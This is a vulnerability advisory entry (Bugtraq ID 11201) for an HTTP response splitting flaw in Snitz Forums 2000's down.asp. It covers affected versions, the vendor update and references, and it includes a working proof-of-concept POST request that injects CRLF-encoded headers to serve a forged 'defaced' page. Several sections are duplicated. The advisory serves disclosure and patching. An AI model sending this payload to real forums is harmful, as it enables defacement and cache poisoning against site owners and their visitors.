Snitz Forums Down.ASP HTTP Response Splitting Vulnerability
BID:11201
Info
Snitz Forums Down.ASP HTTP Response Splitting Vulnerability
| Bugtraq ID: | 11201 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 16 2004 12:00AM |
| Updated: | Sep 16 2004 12:00AM |
| Credit: | Discovery of this vulnerability is credited to "Maestro De-Seguridad" <[email protected]>. |
| Vulnerable: |
Snitz Forums 2000 Snitz Forums 2000 3.4 .04 Snitz Forums 2000 Snitz Forums 2000 3.4 .03 Snitz Forums 2000 Snitz Forums 2000 3.4 .02 Snitz Forums 2000 Snitz Forums 2000 3.3 .03 Snitz Forums 2000 Snitz Forums 2000 3.3 .02 Snitz Forums 2000 Snitz Forums 2000 3.3 .01 Snitz Forums 2000 Snitz Forums 2000 3.3 Snitz Forums 2000 Snitz Forums 2000 3.1 Snitz Forums 2000 Snitz Forums 2000 3.0 |
| Not Vulnerable: | |
Discussion
Snitz Forums Down.ASP HTTP Response Splitting Vulnerability
Snitz Forums is reported prone to a HTTP response splitting vulnerability. The issue exists in a parameter of the 'down.asp' script. The issue presents itself due to a flaw in the affected script that allows an attacker to
manipulate how GET requests are handled.
A remote attacker may exploit this vulnerability to influence or misrepresent how web content is served, cached or interpreted.
Snitz Forums is reported prone to a HTTP response splitting vulnerability. The issue exists in a parameter of the 'down.asp' script. The issue presents itself due to a flaw in the affected script that allows an attacker to
manipulate how GET requests are handled.
A remote attacker may exploit this vulnerability to influence or misrepresent how web content is served, cached or interpreted.
Exploit / POC
Snitz Forums Down.ASP HTTP Response Splitting Vulnerability
The following proof of concept is available:
POST /down.asp HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-length: 134
location=/foo?%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Length:%2014%0d%0aContent-Type:%20text/html%0d%0a%0d%0a{html}defaced{/html}
(replace curly braces with less than and greater than symbols)
The following proof of concept is available:
POST /down.asp HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-length: 134
location=/foo?%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Length:%2014%0d%0aContent-Type:%20text/html%0d%0a%0d%0a{html}defaced{/html}
(replace curly braces with less than and greater than symbols)
Solution / Fix
Snitz Forums Down.ASP HTTP Response Splitting Vulnerability
Solution:
The vendor has released an updated to address this vulnerability:
Snitz Forums 2000 Snitz Forums 2000 3.0
Snitz Forums 2000 Snitz Forums 2000 3.1
Snitz Forums 2000 Snitz Forums 2000 3.3
Snitz Forums 2000 Snitz Forums 2000 3.3 .02
Snitz Forums 2000 Snitz Forums 2000 3.3 .03
Snitz Forums 2000 Snitz Forums 2000 3.3 .01
Snitz Forums 2000 Snitz Forums 2000 3.4 .03
Snitz Forums 2000 Snitz Forums 2000 3.4 .04
Snitz Forums 2000 Snitz Forums 2000 3.4 .02
Solution:
The vendor has released an updated to address this vulnerability:
Snitz Forums 2000 Snitz Forums 2000 3.0
-
Snitz Forums 2000 sf2k_v34_05.zip
http://forum.snitz.com/download.asp
Snitz Forums 2000 Snitz Forums 2000 3.1
-
Snitz Forums 2000 sf2k_v34_05.zip
http://forum.snitz.com/download.asp
Snitz Forums 2000 Snitz Forums 2000 3.3
-
Snitz Forums 2000 sf2k_v34_05.zip
http://forum.snitz.com/download.asp
Snitz Forums 2000 Snitz Forums 2000 3.3 .02
-
Snitz Forums 2000 sf2k_v34_05.zip
http://forum.snitz.com/download.asp
Snitz Forums 2000 Snitz Forums 2000 3.3 .03
-
Snitz Forums 2000 sf2k_v34_05.zip
http://forum.snitz.com/download.asp
Snitz Forums 2000 Snitz Forums 2000 3.3 .01
-
Snitz Forums 2000 sf2k_v34_05.zip
http://forum.snitz.com/download.asp
Snitz Forums 2000 Snitz Forums 2000 3.4 .03
-
Snitz Forums 2000 sf2k_v34_05.zip
http://forum.snitz.com/download.asp
Snitz Forums 2000 Snitz Forums 2000 3.4 .04
-
Snitz Forums 2000 sf2k_v34_05.zip
http://forum.snitz.com/download.asp
Snitz Forums 2000 Snitz Forums 2000 3.4 .02
-
Snitz Forums 2000 sf2k_v34_05.zip
http://forum.snitz.com/download.asp
References
Snitz Forums Down.ASP HTTP Response Splitting Vulnerability
References:
References:
- Snitz Forums 2000 Homepage (Snitz Forums 2000)
- ADVISORY: security hole (http response splitting) in snitz forums 2000 ("Maestro De-Seguridad"
) - Re: ADVISORY: security hole (http response splitting) in snitz forums 2000 (Harold Lines
)